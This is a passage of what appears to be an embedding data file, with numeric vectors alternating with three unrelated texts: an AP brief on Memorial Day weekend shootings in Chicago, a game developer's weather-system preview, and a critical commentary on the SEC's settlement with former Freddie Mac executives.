-0.07018167525529861, -0.023573892191052437, 0.11138853430747986, 0.08519744127988815, -0.03996151685714722, -0.07448995858430862, 0.026723027229309082, 0.017599010840058327, 0.0012892729137092829, 0.004791304003447294, 0.004319851286709309, 0.0914701595902443, -0.064583420753479, 0.05872045457363129, -0.14489226043224335, 0.05048563331365585, -0.11733205616474152, -0.04930084943771362, 0.09697699546813965, 0.05625971779227257, -0.038967594504356384, 0.035102516412734985, 0.021176327019929886, 0.03144408017396927, -0.027146393433213234, -0.04712400212883949, 0.03361203894019127, -0.07494524866342545, -3.6231208103899474e-33, -0.17852462828159332, -0.013712617568671703, -0.023264965042471886, 0.016915936022996902, 0.05142809450626373, -0.0118667371571064, 0.0410645492374897, -0.01554415374994278, 0.04547402262687683, 0.012243663892149925, 0.025386447086930275, -0.00017267480143345892, 0.023777958005666733, -0.016590598970651627, 0.03687428683042526, -0.09137146174907684, 0.01327080000191927, -0.09607097506523132, 0.029889939352869987, -0.012336169369518757, 0.10040698945522308, 0.09451494365930557, 0.0007241596467792988, 0.08945343643426895, -0.05494508147239685, -0.037671081721782684, -0.02456182986497879, 0.018732950091362, 0.006299970205873251, 0.026530595496296883, -0.03314194455742836, -0.06351760029792786, 0.02319776639342308, 0.03772994503378868, 0.06793350726366043, 0.03926580771803856, -0.07392200082540512, -0.036353982985019684, 0.04691695794463158, 0.1199645921587944, 0.035115111619234085, -0.0666426569223404, 0.012821086682379246, -0.02142607420682907, 0.0024296878837049007, 0.1340484768152237, 0.0016691499622538686, 0.04920339956879616, -0.03666548430919647, 0.020055528730154037, -0.08943889290094376, 0.053867220878601074, -0.08924882858991623, 0.09224920719861984, -0.022793300449848175, -0.02214789390563965, -0.08269800245761871, -0.006655918899923563, -0.00961974449455738, 0.05152519419789314, -0.01445435918867588, 0.059434469789266586, 0.0025889426469802856, -0.023235084488987923, -0.028629541397094727, -0.0447428897023201, -0.023594340309500694, -0.07734199613332748, -0.061430424451828, 0.04170084744691849, -0.03253886103630066, -0.0819631814956665, 0.036678534001111984, -0.018335578963160515, -0.022612707689404488, 0.02444695308804512, -0.02382727526128292, 0.06551078706979752, -0.016417039558291435, -0.011885760352015495, -0.05251236632466316, -0.05443926900625229, -0.010551968589425087, -0.10055506229400635, 0.008164199069142342, 0.06368505954742432, 0.05982541665434837, -0.01933608576655388, -0.041471268981695175, 0.04610148444771767, 0.015415465459227562, -0.012259705923497677, -0.06837280839681625, -0.019453328102827072, -0.11062795668840408, -5.543351733194868e-8, -0.04184047505259514, 0.022918863222002983, -0.006080527789890766, 0.05300427973270416, 0.015364006161689758, 0.059362106025218964, 0.006711273919790983, -0.01796361431479454, 0.07119587063789368, 0.00042126825428567827, 0.05700947344303131, -0.02513076923787594, -0.04436170682311058, 0.013617478311061859, 0.010422277264297009, -0.014983301982283592, -0.020396139472723007, -0.024743743240833282, -0.005449824035167694, -0.09434228390455246, 0.04480661824345589, 0.020542502403259277, 0.013073131442070007, 0.008526429533958435, 0.020824268460273743, 0.059400781989097595, -0.05209619551897049, 0.09315503388643265, -0.02716790698468685, -0.022055460140109062, -0.027516750618815422, -0.018327994272112846, -0.06284689158201218, 0.0024283290840685368, 0.054688334465026855, 0.060331299901008606, -0.0568249486386776, 0.03480222448706627, 0.1151188537478447, 0.05647791549563408, 0.0008507458260282874, 0.007437145337462425, 0.002903526648879051, 0.043307624757289886, -0.02703958936035633, 0.022002581506967545, 0.0718759149312973, 0.030346347019076347, -0.0020117873791605234, -0.012544253841042519, 0.018802160397171974, 0.018418924883008003, 0.042349278926849365, -0.053274065256118774, 0.04404867812991142, 0.07051641494035721, -0.016239527612924576, -0.021002471446990967, -0.03207940608263016, -0.020458143204450607, 0.009713616222143173, -0.06835044175386429, -0.08742336183786392, 0.07037367671728134 ]
CHICAGO (AP) — Gun violence has marked the unofficial start of summer in Chicago, where dozens have been shot and six have been killed over Memorial Day weekend. The Chicago Tribune reports a total of 15 people were shot overnight into Tuesday, two fatally. The newspaper says those shootings bring the total number shot since Friday to 68. –Attorney General Announces Official Investigation into Chicago Police Department –Bernie Sanders Calls Out Chicago Officials over Handling of Laquan McDonald Case Chicago police say final numbers will be released later Tuesday. Police had announced plans to step up patrols throughout the city in an effort to prevent violence that occurred during Memorial Day weekend last year, when a dozen people were killed and 44 more were hurt. Copyright 2016 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.
[ 0.06458404660224915, 0.004389723297208548, 0.04999221861362457, -0.010041164234280586, 0.12958329916000366, 0.05789276584982872, -0.015436613000929356, -0.0006806048331782222, -0.04382859915494919, 0.05955452844500542, 0.09427045285701752, 0.08037140220403671, -0.0511043481528759, -0.06392316520214081, -0.02153843641281128, -0.05857153609395027, 0.054167527705430984, -0.05480308085680008, -0.03870978578925133, -0.006286491174250841, -0.0422498919069767, -0.056633155792951584, 0.07109200954437256, 0.03000502847135067, -0.031672485172748566, -0.0204346664249897, -0.029978586360812187, -0.04646456614136696, 0.007624519523233175, -0.003026943886652589, 0.026341937482357025, -0.026541147381067276, -0.0377684086561203, 0.02790728211402893, 0.022960316389799118, -0.10657421499490738, 0.0641709491610527, 0.018765820190310478, 0.012900320813059807, 0.06188123673200607, 0.06125352904200554, -0.005271072033792734, 0.020458107814192772, 0.012110181152820587, 0.0018592339474707842, 0.014313731342554092, -0.10671206563711166, 0.012300790287554264, 0.043445006012916565, 0.028694264590740204, 0.04875589907169342, 0.020960303023457527, -0.048907071352005005, 0.04147620126605034, -0.00587113481014967, -0.07903170585632324, -0.036728788167238235, -0.012570369057357311, 0.03405288606882095, 0.07603494077920914, -0.0513777881860733, 0.01336907222867012, -0.037319764494895935, -0.036104653030633926, 0.02386304922401905, 0.057319168001413345, -0.017735902220010757, -0.07697384804487228, 0.045333556830883026, 0.06225784868001938, 0.1130419597029686, 0.0780664011836052, 0.029948733747005463, 0.019174054265022278, -0.07903627306222916, -0.02192024700343609, 0.02066109888255596, -0.010012694634497166, 0.08068346977233887, -0.03476285561919212, 0.07591487467288971, -0.08953003585338593, 0.05167814716696739, -0.015296709723770618, -0.02869199588894844, 0.0032774133142083883, -0.055709462612867355, 0.03631281480193138, 0.03092106617987156, -0.022641388699412346, -0.04880118742585182, 0.039007965475320816, 0.0134280351921916, -0.015695761889219284, -0.003012059722095728, 0.06193355843424797, -0.06645744293928146, 0.062361616641283035, -0.03496066480875015, -0.0067502958700060844, -0.008413394913077354, 0.01628696732223034, 0.047012027353048325, -0.1261374056339264, 0.02180768921971321, 0.02176111377775669, -0.048098769038915634, -0.025908488780260086, -0.07270935922861099, 0.004088917281478643, 0.09426462650299072, 0.06272576004266739, 0.05854303017258644, -0.0007818115409463644, 0.09150604903697968, -0.04252566024661064, 0.012371628545224667, 0.04103409871459007, 0.006531469523906708, -0.06049264594912529, 0.05226390063762665, 0.01435368973761797, -0.00607161084190011, -0.004184628836810589, -0.028030434623360634, 0.05765445902943611, 0.016831116750836372, 4.8876684091786236e-33, 0.03397495672106743, -0.0967104583978653, 0.028344376012682915, -0.010985122062265873, 0.04640498757362366, -0.11385028809309006, 0.036763887852430344, 0.04645582661032677, 0.056246206164360046, 0.006565071642398834, -0.046318817883729935, -0.13688108325004578, -0.0169838834553957, 0.033222898840904236, -0.0050740898586809635, -0.002275909297168255, 0.06020847707986832, 0.06418152153491974, -0.044017862528562546, 0.02181006222963333, -0.0003071756800636649, -0.09797320514917374, -0.058178242295980453, 0.04430273920297623, 0.007838510908186436, 0.08309464156627655, -0.002242130460217595, 0.12632131576538086, 0.0012289519654586911, -0.024464644491672516, 0.009401901625096798, 0.06070903688669205, 0.07414755970239639, 0.09243899583816528, 0.12278704345226288, -0.04497712850570679, 0.08035294711589813, 0.0545584000647068, -0.03386963903903961, -0.09711246192455292, 0.007279819343239069, 0.06700899451971054, -0.09035125374794006, -0.06774812936782837, 0.006249737925827503, 0.013936800882220268, -0.033038049936294556, -0.05311620235443115, -0.065264992415905, -0.030115853995084763, 0.04393627122044563, -0.0000010171247595280875, -0.03829272463917732, 0.04936642199754715, -0.047687530517578125, 0.05424303188920021, -0.09357396513223648, -0.07865018397569656, 0.06682019680738449, 0.05949593335390091, 0.07272718101739883, 0.11022751033306122, -0.020138878375291824, -0.06295507401227951, 0.03009381890296936, -0.010920130647718906, -0.01649179868400097, 0.005717913620173931, 0.04787848889827728, 0.01660819537937641, 0.06430811434984207, -0.028994372114539146, -0.008804123848676682, -0.10678265243768692, 0.05035009607672691, 0.012784650549292564, 0.04257546365261078, -0.02232424169778824, 0.007944468408823013, 0.09219539165496826, 0.03823092207312584, 0.0033405886497348547, 0.013397241942584515, 0.049157917499542236, 0.06950724124908447, 0.039170920848846436, -0.014339117333292961, -0.02598385512828827, -0.09017173945903778, -0.009891673922538757, -0.036617908626794815, -0.034566644579172134, -0.009358174167573452, 0.06654620170593262, -0.06969330459833145, -7.13823058767062e-33, -0.06490936130285263, 0.00971525814384222, -0.06786796450614929, -0.015197476372122765, -0.000026750894903670996, -0.058068592101335526, -0.03969790041446686, -0.007863922044634819, 0.07031510025262833, -0.03042139858007431, -0.028055641800165176, -0.04714803025126457, -0.022860867902636528, 0.0650375708937645, 0.014156706631183624, -0.0567675419151783, -0.03176726773381233, 0.0408167727291584, -0.10595397651195526, 0.021890917792916298, 0.027510682120919228, -0.04532989487051964, 0.011088315397500992, 0.05831946060061455, 0.0521194152534008, 0.0578978955745697, 0.07143645733594894, -0.0021702826488763094, -0.03982839360833168, -0.017273234203457832, 0.02270415984094143, -0.0434398353099823, 0.0729495957493782, 0.023182008415460587, -0.05155761539936066, 0.043244682252407074, 0.10311967879533768, -0.0090713482350111, 0.0232035331428051, -0.01908411644399166, 0.05116504058241844, -0.011958427727222443, 0.0059855966828763485, -0.021124765276908875, -0.074537493288517, 0.011361520737409592, 0.024762624874711037, 0.03468168526887894, -0.07971271127462387, 0.008914700709283352, -0.07928962260484695, -0.0468456856906414, -0.12075145542621613, 0.08378275483846664, -0.05348461493849754, -0.052884962409734726, 0.05740048363804817, -0.06247398629784584, -0.014101198874413967, 0.006640219129621983, -0.01066768541932106, 0.051949676126241684, -0.10177650302648544, 0.06552018225193024, 0.03005426749587059, -0.05163361877202988, -0.032201241701841354, -0.1123383417725563, -0.04921304062008858, -0.04010525345802307, 0.009793523699045181, 0.00221763807348907, -0.053559478372335434, 0.027194447815418243, -0.10399213433265686, -0.039828311651945114, 0.016218438744544983, 0.033400408923625946, -0.0613148994743824, 0.08545996993780136, 0.023152679204940796, -0.11143968999385834, -0.0365133136510849, 0.06024113669991493, -0.02867211401462555, -0.01024443656206131, 0.08876778930425644, -0.010874862782657146, -0.027271369472146034, 0.07224507629871368, -0.05301259458065033, -0.040916528552770615, 0.005073759239166975, 0.015029476955533028, -0.10740817338228226, -5.447512307910074e-8, 0.03723035380244255, 0.00903273280709982, -0.03797195851802826, -0.05478207767009735, -0.0054087769240140915, -0.018310291692614555, -0.04379578307271004, 0.016719505190849304, 0.01235521212220192, -0.002447334583848715, 0.07508361339569092, 0.024264566600322723, -0.04561956226825714, -0.023885006085038185, -0.0764048621058464, -0.08249721676111221, -0.021363846957683563, -0.05250125750899315, -0.019821524620056152, -0.0036701487842947245, -0.03391916677355766, -0.017186753451824188, -0.028094898909330368, 0.04696723073720932, 0.10456999391317368, 0.02545216679573059, -0.0569000169634819, 0.05925358086824417, -0.04017714411020279, 0.074803926050663, -0.055839695036411285, 0.014149484224617481, -0.005997766274958849, -0.015198692679405212, 0.06734568625688553, -0.028217684477567673, 0.05248836800456047, -0.008465589955449104, 0.00018536890274845064, -0.05074327439069748, -0.08459141105413437, -0.042875178158283234, -0.0174569021910429, 0.01869504153728485, 0.02937963604927063, -0.047437623143196106, -0.015720803290605545, -0.046137645840644836, -0.010118800215423107, -0.005689868703484535, -0.04415386542677879, -0.08500976860523224, -0.003971382509917021, 0.0021314446348696947, 0.0174851231276989, -0.020884491503238678, -0.03351036086678505, -0.019608955830335617, 0.04965759441256523, -0.06107421964406967, 0.0478137768805027, -0.01401993166655302, -0.04065994918346405, 0.03220662847161293 ]
Weather! Here is a very early first peek at our new weather system. Pictured here it is drizzling freezing rain after snowfall in the wasteland. Snow realistically piles on top of surfaces exposed to the weather. Things under cover or interiors do not get rain or snow in them. We plan on adding cold and hot survival to accompany the new beautiful weather effects. We’ll have rain and snow, plus dust storms, and hopefully even lightning. What is really cool is the old trampled snow we have in the snow biome gets fresh snow on top of it and windows and nooks and crannies just get some snow in them. It accumulates over time and changes appearance it looks awesome. I’ll post a video once we get everything polished.
[ -0.06180373951792717, -0.013865186832845211, 0.16222549974918365, 0.05541212856769562, 0.09397587925195694, -0.06118108332157135, -0.0009064478799700737, -0.013398612849414349, -0.05570800602436066, 0.05714249238371849, -0.07564933598041534, -0.044625766575336456, 0.04242860898375511, 0.03675256669521332, -0.046273499727249146, -0.010143345221877098, 0.01050373911857605, -0.07564127445220947, -0.0028481397312134504, 0.029970677569508553, -0.00872182659804821, 0.017857292667031288, -0.05356188490986824, -0.0053300512954592705, -0.022841354832053185, 0.0685383528470993, -0.05940095707774162, 0.0941564291715622, -0.0541946217417717, -0.046178434044122696, -0.021933989599347115, 0.06057173013687134, 0.03436557948589325, -0.0251172948628664, 0.009429167956113815, 0.01894913613796234, 0.040667422115802765, -0.06192914396524429, -0.05513039603829384, 0.004606770817190409, -0.0380093976855278, -0.028818713501095772, 0.01859399303793907, -0.03518243879079819, -0.0171688050031662, 0.0038665446918457747, 0.02332906238734722, 0.02929878607392311, 0.06759677082300186, -0.029614241793751717, 0.0030708929989486933, -0.014804520644247532, -0.04910208657383919, 0.045373715460300446, -0.06658507138490677, 0.026235895231366158, -0.021182483062148094, -0.10397591441869736, -0.049797214567661285, -0.06583748757839203, 0.0328214056789875, 0.036689579486846924, -0.08954400569200516, 0.0647902563214302, 0.16113467514514923, -0.05288088321685791, -0.06890357285737991, 0.05509335175156593, 0.03198729455471039, -0.03793838992714882, -0.050796136260032654, 0.13123025000095367, 0.010191502049565315, -0.033942896872758865, -0.041699521243572235, 0.017695924267172813, -0.05715309455990791, -0.06495211273431778, 0.021851040422916412, -0.013938660733401775, 0.096766397356987, -0.013156912289559841, 0.06337550282478333, 0.00072313571581617, -0.06131695955991745, 0.018656814470887184, 0.025716805830597878, -0.03331608697772026, 0.024854928255081177, -0.06623533368110657, -0.047970641404390335, -0.008623518981039524, -0.005710730794817209, 0.024733688682317734, -0.14793576300144196, 0.11065288633108139, 0.04210460186004639, -0.08337738364934921, -0.04508411884307861, 0.05874891206622124, -0.03515317663550377, -0.06935030966997147, 0.06288351863622665, -0.038080669939517975, 0.061735689640045166, -0.0138687239959836, -0.04025373235344887, -0.01177755743265152, -0.050540417432785034, 0.009813077747821808, -0.01254414115101099, 0.02422594092786312, -0.054256755858659744, 0.06610596925020218, 0.03184132277965546, -0.06355395168066025, -0.03354322537779808, 0.011994855478405952, -0.010400193743407726, 0.005073347594588995, 0.013159721158444881, 0.04313574358820915, -0.029754001647233963, 0.06526223570108414, 0.1002672016620636, 0.04420588165521622, 0.035830289125442505, 4.975168902575973e-33, 0.07905726134777069, -0.019481081515550613, 0.015092693269252777, 0.08332077413797379, 0.08054124563932419, -0.07563542574644089, 0.0045785135589540005, -0.07231258600950241, -0.036517564207315445, 0.04977011680603027, 0.03474241495132446, 0.037505824118852615, -0.04523974657058716, 0.027048729360103607, 0.02307954989373684, -0.0468519851565361, -0.07979683578014374, -0.04906149581074715, -0.02189188078045845, 0.1428270787000656, -0.07796329259872437, 0.03831325098872185, -0.004807662684470415, 0.03002971224486828, 0.03188876435160637, -0.002026154426857829, 0.05329173058271408, -0.02279639057815075, -0.0050128609873354435, -0.0000795315281720832, 0.04417301341891289, -0.034573107957839966, 0.0032439245842397213, 0.029054198414087296, -0.018076322972774506, -0.01981670781970024, -0.024705028161406517, -0.031116478145122528, 0.04145238548517227, -0.013826664537191391, -0.017866311594843864, -0.056196343153715134, -0.030604269355535507, -0.03184106945991516, 0.06388279050588608, -0.0059077125042676926, 0.09043576568365097, 0.01972377859055996, -0.06324589997529984, 0.005691814702004194, 0.030656874179840088, 0.04192865267395973, -0.02164769172668457, -0.02566611021757126, -0.05143158137798309, 0.011847365647554398, 0.10307487845420837, -0.07397883385419846, 0.028199495747685432, -0.000932594237383455, 0.006523604039102793, 0.007548050954937935, 0.03627170994877815, -0.15613797307014465, -0.0038765238132327795, -0.02875790372490883, 0.026130670681595802, 0.10560194402933121, -0.03512768819928169, 0.009653622284531593, -0.018250832334160805, -0.008090752176940441, 0.03691955283284187, 0.04189727082848549, 0.06318835914134979, 0.0230550616979599, 0.01195992436259985, -0.04914941266179085, 0.018502281978726387, 0.021389910951256752, -0.042847901582717896, 0.017730791121721268, -0.05276932194828987, -0.008330194279551506, -0.01455014105886221, 0.002050062408670783, 0.025566138327121735, 0.0024840962141752243, -0.011040518060326576, 0.05053376778960228, 0.007712943945080042, -0.013165606185793877, 0.0680045485496521, 0.038915231823921204, 0.04697958379983902, -6.426304923722579e-33, 0.06914253532886505, -0.02905982732772827, -0.008740687742829323, 0.02936382032930851, -0.03140642121434212, 0.054406531155109406, -0.0643332302570343, 0.09528554230928421, 0.028574345633387566, -0.016744984313845634, -0.0296611487865448, 0.07155761867761612, 0.02281414531171322, -0.04745495319366455, -0.005173305049538612, 0.04261057451367378, 0.019011128693819046, -0.023299288004636765, -0.05732361227273941, -0.03279643505811691, -0.003914607688784599, 0.06526696681976318, -0.07094347476959229, -0.0022042638156563044, -0.06369215250015259, 0.014603907242417336, 0.029635289683938026, 0.055257927626371384, 0.0025374870747327805, -0.019418787211179733, -0.06973238289356232, -0.051347967237234116, 0.037407051771879196, -0.04324657469987869, -0.030650081112980843, 0.07441772520542145, 0.05708128958940506, -0.16292163729667664, -0.09547373652458191, -0.07514209300279617, 0.05478140711784363, -0.08131550252437592, 0.09821770340204239, 0.024105852469801903, 0.08305182307958603, -0.06758617609739304, -0.11021295934915543, 0.02486954815685749, 0.028511786833405495, -0.020212145522236824, 0.07175571471452713, -0.02433111146092415, -0.0520293265581131, -0.02594025805592537, 0.021681152284145355, -0.01373457070440054, -0.002031216397881508, -0.031854499131441116, -0.039331212639808655, 0.03680591657757759, -0.06147894263267517, -0.021952776238322258, -0.054144080728292465, -0.0072793737053871155, -0.021893713623285294, -0.05839817598462105, -0.0290810689330101, -0.05228748917579651, -0.06835346668958664, 0.06747778505086899, 0.06040516123175621, -0.008437898941338062, -0.0841539278626442, -0.08861447125673294, 0.09915753453969955, 0.009592714719474316, 0.09321195632219315, 0.013337062671780586, -0.011625089682638645, 0.019135288894176483, -0.07714244723320007, 0.01806650124490261, -0.042489856481552124, 0.06995947659015656, 0.07003007084131241, 0.023984422907233238, -0.012595228850841522, -0.06736042350530624, 0.004479026887565851, 0.06165468320250511, 0.03043222613632679, 0.04659826681017876, -0.03619987145066261, 0.046812642365694046, 0.02306954562664032, -5.193170693473803e-8, 0.04485585540533066, 0.048135921359062195, -0.044304411858320236, 0.003778839949518442, -0.012817326001822948, -0.045725490897893906, 0.05559598654508591, -0.0680384561419487, 0.042480211704969406, -0.04886723309755325, 0.0012894534738734365, 0.03995468467473984, 0.009732086211442947, 0.1152195855975151, 0.011316939257085323, 0.026813814416527748, -0.03525213897228241, 0.008412862196564674, -0.08567409962415695, -0.06204007938504219, -0.010711929760873318, -0.011267313733696938, 0.012610863894224167, 0.026409868150949478, 0.022206954658031464, 0.01700761169195175, 0.02316943183541298, -0.03108716942369938, 0.06837163120508194, 0.06336145848035812, -0.10428693145513535, -0.018078818917274475, -0.02796896919608116, 0.012844354845583439, 0.016497701406478882, -0.04053385183215141, -0.0032991727348417044, 0.025917265564203262, -0.013067268766462803, -0.02290700189769268, 0.030969679355621338, -0.023690667003393173, -0.015677357092499733, 0.0013481936184689403, -0.03780702129006386, 0.018669912591576576, -0.05236396938562393, -0.010315826162695885, 0.031929899007081985, 0.0417599193751812, -0.03445104509592056, -0.031621433794498444, 0.009600057266652584, 0.1063169613480568, 0.05432294309139252, 0.07274330407381058, -0.03825125843286514, -0.03021460585296154, 0.037483252584934235, 0.0680554136633873, 0.0012647854164242744, -0.06840036809444427, -0.15073099732398987, 0.07627608627080917 ]
Last month, we discussed a government report which showed that, much to the chagrin of a few billionaires and a long line of retail investors who bought the proverbial dip, Fannie Mae and Freddie Mac may be destined, by design, by decades of reckless behavior, and by Treasury decree, to be insolvent most of the time. Today, we learned that when it comes to accountability for the executives who helped put the companies in a position whereby receivership became necessary in mid-2008, we can forget about it. In what was billed as a “high profile” case, the SEC had sought financial and other penalties against three former Freddie Mac executives who allegedly “misled” investors in 2006 by understating the amount of subprime exposure the GSE had on its books while it was simultaneously still sucking up and packaging bad loans. If the SEC allegations are indeed accurate, it’s probably safe to say that using the term “understated” to describe the executives’ misrepresentations is, well, an understatement, because it appears they may have lowballed the figure by a factor of 28. Here’s AP: According to the SEC, Fannie and Freddie misrepresented their exposure to mortgages for borrowers with weak credit in reports, speeches and congressional testimony. The SEC said Freddie told investors in late 2006 that it held between $2 billion and $6 billion of subprime mortgages on its books — but its actual subprime holdings were actually closer to $141 billion, or 10 percent of its portfolio in 2006, and $244 billion, or 14 percent, by 2008. But all’s well that ends in a catastrophic housing market meltdown apparently because as WSJ notes, everyone seems to have gotten a pretty good deal considering their actions may have contributed mightily to the worst financial crisis since The Great Depression: The civil case, filed in 2011, had alleged that three Freddie executives, including former Chief Executive Officer Richard Syron, knowingly misled investors about the volume of risky mortgages the company purchased as the housing boom came to an end. The SEC had sought financial penalties against the executives and an order barring them from serving as officers and directors at other companies. Instead, the executives agreed for a limited time not to sign certain reports required by chief executives or finance chiefs and to pay a total of $310,000 to a fund meant to compensate defrauded investors. The breakdown of the fees is as follows: Richard Syron, $250,000; Donald Bisenius, $50,000; Patricia Cook, $10,000. As you can see, Ms. Cook got off pretty easy, but then again, they all did because they don’t actually have to pay the fines: Those amounts will be paid by insurance from Freddie Mac that covered the executives. And no one had to admit to anything of course: The pact said both sides agreed to the settlement “without conceding the strengths and weaknesses of their respective claims and defenses.” Which is just fine with the folks from Freddie who understandably believe it’s not in their best interest for the government to continue to investigate them for fraud and who are pleased to report that in addition to the fact that they will not have to pay anything out of pocket, they will not be limited “in any practical way” by the decision: Mr. Syron said, “The agreement states that it is not in the interests of justice to continue to litigate this matter, and I wholeheartedly agree with that sentiment.” Steven Salky, who represented Ms. Cook, said, they ”are extremely pleased with this resolution.” Mr. Bisenius said, “The undertakings to which I have agreed in order to put this case behind me do not limit me in any practical way.” So in the end, all three executives were slapped with fines which they don’t have to pay and were reprimanded in a way that doesn’t limit their future activities at all, which the SEC reckons is commensurate with their part in sinking the entire world economy: “The settlement’s limitations on future activities (ZH: these are the limitations that don’t limit any one in a practical way) and financial payments (ZH: financial payments they don’t have to pay) reflect an appropriate resolution of the matter,” said Andrew Ceresney, the SEC’s enforcement director. And remember, there's just one month left under Eric Holder's recent ultimatum which may or may not mean that after May... * * * Meanwhile, FHFA officials are busy making sure there’s no chance that the two entities will ever get themselves into another situation where their securitization practices are likely to encourage shoddy lending standards. Here’s WSJ from an article that was posted Wednesday afternoon:
[ -0.02640632912516594, -0.028007086366415024, 0.05192742496728897, 0.0664181262254715, 0.01225372962653637, -0.012627065181732178, 0.04986022412776947, 0.08573436737060547, 0.021200217306613922, 0.019037043675780296, 0.04738474637269974, 0.055808596312999725, 0.06029904633760452, -0.09543737024068832, 0.008823898620903492, -0.05134577304124832, 0.046536754816770554, -0.008546855300664902, -0.0853034034371376, 0.0385948084294796, 0.040574319660663605, -0.05213971808552742, -0.11250410974025726, 0.06739891320466995, -0.006210907828062773, -0.05015285313129425, -0.032477814704179764, -0.05771646276116371, -0.08903278410434723, -0.020749595016241074, -0.026739004999399185, -0.028473002836108208, 0.027803827077150345, 0.07002079486846924, 0.03458426520228386, 0.03011566586792469, 0.06370292603969574, -0.008713528513908386, -0.018429024145007133, 0.018697652965784073, 0.039473552256822586, -0.019730014726519585, 0.0012636891333386302, -0.008013760671019554, -0.0016619644593447447, -0.04469988867640495, 0.07134214043617249, -0.028469901531934738, -0.08996843546628952, -0.00811280682682991, -0.06430912017822266, -0.028583336621522903, 0.08394701778888702, -0.04895087704062462, -0.04048214852809906, 0.03781338408589363, -0.0037110133562237024, -0.054916396737098694, 0.037028633058071136, 0.01651357114315033, 0.013694003224372864, -0.029159028083086014, -0.061957743018865585, -0.0321597084403038, 0.053335823118686676, 0.027144882827997208, 0.027433741837739944, -0.03457038477063179, 0.03433941304683685, 0.09870639443397522, 0.12938307225704193, -0.16375376284122467, -0.018574081361293793, 0.020622748881578445, -0.012402530759572983, -0.02510189265012741, 0.0051625617779791355, 0.0860970988869667, 0.08060262352228165, -0.1062512919306755, 0.07758917659521103, -0.06465406715869904, -0.04098138213157654, -0.074271060526371, -0.0012597755994647741, -0.041335541754961014, -0.016874782741069794, -0.003920051269233227, 0.03807878866791725, 0.0021096179261803627, 0.036819927394390106, -0.05430908128619194, 0.08684573322534561, 0.0015868261689320207, 0.039804793894290924, 0.009997677057981491, -0.026652159169316292, -0.0762171819806099, -0.03945402428507805, 0.08723445981740952, -0.02214948832988739, 0.12258397787809372, -0.08313637226819992, -0.014158410020172596, 0.017200389876961708, -0.07826980948448181, 0.01101559679955244, 0.01836996152997017, -0.09183645248413086, 0.017564503476023674, -0.008279534988105297, 0.04774504527449608, -0.03095964342355728, 0.024879079312086105, 0.026257121935486794, 0.030287565663456917, -0.007870533503592014, 0.012939177453517914, -0.000764561234973371, 0.004231465980410576, 0.08816973119974136, 0.08723684400320053, 0.011531642638146877, 0.0611049123108387, -0.0638100653886795, 0.03163760527968407, -0.14296461641788483, 1.627514356712682e-33, -0.014231652021408081, 0.055240508168935776, 0.02118626981973648, -0.0257884431630373, -0.024814771488308907, -0.013241329230368137, -0.034803394228219986, -0.03677869588136673, 0.08752273768186569, 0.09379899501800537, -0.007575126830488443, 0.03499555215239525, -0.011726575903594494, -0.005476064048707485, -0.04312698543071747, 0.013269607909023762, -0.06920932978391647, 0.036450307816267014, 0.02146071195602417, -0.009224174544215202, -0.007206066977232695, 0.033938415348529816, -0.009891735389828682, -0.07671797275543213, -0.010316664353013039, -0.07212638109922409, -0.09846417605876923, 0.012374000623822212, 0.019291667267680168, 0.02674693800508976, 0.02499869093298912, -0.0278953704982996, 0.08264819532632828, -0.0248448196798563, 0.02591821737587452, -0.03686825558543205, -0.00782032124698162, -0.03990798071026802, -0.011659997515380383, 0.052068136632442474, -0.07081781327724457, 0.03834255784749985, -0.045134760439395905, -0.014567968435585499, -0.03638486936688423, 0.06586035341024399, -0.017019817605614662, -0.10078645497560501, -0.0652603805065155, 0.03763366863131523, 0.05508372187614441, 0.01757640950381756, 0.04559631645679474, 0.028500838205218315, -0.08246587961912155, 0.013911347836256027, 0.025294989347457886, -0.08666595816612244, 0.048176731914281845, -0.026318619027733803, 0.07139098644256592, 0.00980397779494524, -0.0232730470597744, -0.044286999851465225, -0.06112176179885864, 0.06268958747386932, 0.05636795982718468, 0.11333005130290985, -0.10516765713691711, 0.04082461819052696, -0.034090396016836166, -0.052349597215652466, -0.021281005814671516, -0.00208142027258873, -0.0826525166630745, -0.04847050458192825, -0.020573850721120834, 0.0693574994802475, 0.034913070499897, -0.0392347127199173, 0.0465833842754364, -0.060765136033296585, 0.07919066399335861, 0.01876811496913433, -0.027082553133368492, 0.06762140244245529, 0.05150572210550308, 0.008251409977674484, 0.011735877022147179, 0.028023360297083855, -0.023875046521425247, 0.005642393138259649, 0.049145977944135666, 0.03970032557845116, -0.06133975461125374, -3.931788729184587e-33, -0.12444168329238892, -0.052530109882354736, -0.024028973653912544, -0.019837280735373497, -0.07658461481332779, 0.018649261444807053, -0.003711588215082884, -0.03938690945506096, -0.011678295210003853, -0.03445162624120712, -0.07803136110305786, 0.002259747125208378, -0.026788044720888138, -0.02906748466193676, -0.06414967030286789, -0.023572422564029694, 0.024142013862729073, -0.04614557698369026, 0.016691623255610466, -0.04375031962990761, 0.1263701617717743, -0.013303807005286217, 0.005363434087485075, 0.08196049183607101, -0.048135027289390564, 0.023747306317090988, 0.027655327692627907, -0.015244862996041775, -0.03062966838479042, -0.015211929567158222, 0.02048763632774353, 0.04545187950134277, 0.040107544511556625, -0.007064875680953264, -0.04278544709086418, -0.029671685770154, 0.009326416999101639, -0.010978156700730324, -0.04806367680430412, -0.047009117901325226, -0.03821489214897156, 0.020176690071821213, -0.04172474890947342, 0.013082458637654781, 0.010673695243895054, 0.04864172264933586, 0.020580526441335678, -0.07293606549501419, 0.07025666534900665, 0.0189686082303524, -0.04905810207128525, -0.08965367078781128, 0.0381360724568367, 0.1304779350757599, -0.09198053181171417, -0.013447605073451996, 0.024418536573648453, 0.011368825100362301, 0.06270681321620941, 0.0703933909535408, 0.009041880257427692, -0.01864858716726303, -0.04429125785827637, -0.06373024731874466, 0.05959850177168846, -0.023792961612343788, 0.010005194693803787, -0.07142855226993561, 0.019135119393467903, -0.0398537740111351, 0.017231574282050133, -0.10246124118566513, -0.07395488768815994, -0.06365735828876495, -0.028736265376210213, 0.10741852223873138, -0.06974630057811737, -0.026240892708301544, -0.06212667003273964, 0.022511137649416924, -0.013544331304728985, 0.016518857330083847, -0.0014570446219295263, 0.03846209868788719, -0.003886889899149537, -0.0013570153387263417, 0.09487638622522354, -0.004627365618944168, -0.007139710243791342, 0.02656773291528225, -0.028162257745862007, -0.10040713846683502, 0.050648245960474014, 0.013145236298441887, -0.0233757421374321, -5.815487824634147e-8, 0.03183290734887123, -0.010030029341578484, 0.010158909484744072, -0.019015461206436157, 0.06418707221746445, -0.030277227982878685, -0.0526958666741848, 0.01759006641805172, 0.03470275551080704, -0.0021876159589737654, 0.04020625725388527, -0.01454691682010889, 